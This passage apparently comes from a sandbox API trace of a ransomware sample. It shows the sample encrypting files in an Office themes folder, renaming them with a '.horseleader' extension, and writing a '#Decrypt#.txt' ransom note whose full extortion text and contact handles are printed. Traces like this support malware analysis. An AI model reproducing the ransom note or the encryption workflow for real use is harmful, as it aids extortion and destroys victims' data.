pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\..") returned 67 [0247.218] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.218] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0247.218] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f26d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f26d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1015d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="IRIS.ELM", cAlternateFileName="")) returned 1 [0247.218] lstrcmpiW (lpString1="IRIS.ELM", lpString2="Windows") returned -1 [0247.218] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM") returned 73 [0247.218] StrStrIW (lpFirst="IRIS.ELM", lpSrch=".horseleader") returned 0x0 [0247.219] lstrcmpW (lpString1="IRIS.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.219] lstrcmpW (lpString1="IRIS.ELM", lpString2="_uninstalling_.png") returned 1 [0247.219] lstrlenW (lpString=".testttjffg") returned 11 [0247.219] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM", lpSrch=".testttjffg") returned 0x0 [0247.219] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.219] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.220] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM") returned 73 [0247.220] StrStrW (lpFirst="IRIS.ELM", lpSrch=".txt") returned 0x0 [0247.220] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=65885) returned 1 [0247.221] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.221] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.223] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.223] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.224] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.224] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.225] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.225] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.225] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb15d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0247.225] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.226] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.226] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.227] CloseHandle (hObject=0x1a4) returned 1 [0247.227] GetProcessHeap () returned 0x780000 [0247.227] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.227] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM.horseleader") returned 85 [0247.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\IRIS\\IRIS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm.horseleader")) returned 1 [0247.228] GetProcessHeap () returned 0x780000 [0247.228] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.228] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1ce, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="IRIS.INF", cAlternateFileName="")) returned 1 [0247.228] lstrcmpiW (lpString1="IRIS.INF", lpString2="Windows") returned -1 [0247.228] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF") returned 73 [0247.228] StrStrIW (lpFirst="IRIS.INF", lpSrch=".horseleader") returned 0x0 [0247.229] lstrcmpW (lpString1="IRIS.INF", lpString2="#Decrypt#.txt") returned 1 [0247.229] lstrcmpW (lpString1="IRIS.INF", lpString2="_uninstalling_.png") returned 1 [0247.229] lstrlenW (lpString=".testttjffg") returned 11 [0247.229] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF", lpSrch=".testttjffg") returned 0x0 [0247.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.229] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.229] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF" 
(normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF") returned 73 [0247.230] StrStrW (lpFirst="IRIS.INF", lpSrch=".txt") returned 0x0 [0247.230] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=462) returned 1 [0247.230] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1ce, lpOverlapped=0x0) returned 1 [0247.231] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.231] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1ce, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1ce, lpOverlapped=0x0) returned 1 [0247.232] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.232] CloseHandle (hObject=0x1a4) returned 1 [0247.232] GetProcessHeap () returned 0x780000 [0247.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 
[0247.233] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF.horseleader") returned 85 [0247.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf.horseleader")) returned 1 [0247.236] GetProcessHeap () returned 0x780000 [0247.236] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.237] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9ac, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.237] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.237] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 76 [0247.237] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.237] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.237] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.237] lstrlenW (lpString=".testttjffg") returned 11 [0247.237] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\IRIS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.237] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.237] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.239] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 76 [0247.239] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.239] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2476) returned 1 [0247.239] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x9ac, lpOverlapped=0x0) returned 1 [0247.241] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff654, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.241] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x9ac, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x9ac, lpOverlapped=0x0) returned 1 [0247.241] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.241] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.242] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.242] CloseHandle (hObject=0x1a4) returned 1 [0247.242] GetProcessHeap () returned 0x780000 [0247.242] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.242] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.horseleader") returned 88 [0247.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.horseleader")) returned 1 [0247.243] GetProcessHeap () returned 0x780000 [0247.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.243] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c1d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.243] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.244] wnsprintfW (in: 
pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 77 [0247.244] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.244] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.244] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.244] lstrlenW (lpString=".testttjffg") returned 11 [0247.244] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.244] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.244] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 77 [0247.245] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.245] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19485) returned 1 [0247.245] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4c1d, lpOverlapped=0x0) returned 1 [0247.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb3e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0247.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4c1d, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4c1d, lpOverlapped=0x0) returned 1 [0247.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.248] CloseHandle (hObject=0x1a4) returned 1 [0247.249] GetProcessHeap () returned 0x780000 [0247.249] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.249] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.horseleader") returned 89 [0247.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.horseleader")) returned 1 [0247.250] GetProcessHeap () returned 0x780000 [0247.250] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.250] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c1d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.250] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.250] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\#Decrypt#.txt") returned 78 [0247.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.251] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.251] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.253] lstrlenA (lpString="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") returned 1368 [0247.253] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.253] CloseHandle (hObject=0x158) returned 1 [0247.253] GetProcessHeap () returned 0x780000 [0247.253] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.253] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0247.253] lstrcmpiW (lpString1="JOURNAL", lpString2="Windows") returned -1 [0247.253] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned 67 [0247.253] lstrcmpW (lpString1="JOURNAL", lpString2=".") returned 1 [0247.254] lstrcmpW (lpString1="JOURNAL", lpString2="..") returned 1 [0247.254] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.254] GetProcessHeap () returned 0x780000 [0247.254] RtlAllocateHeap 
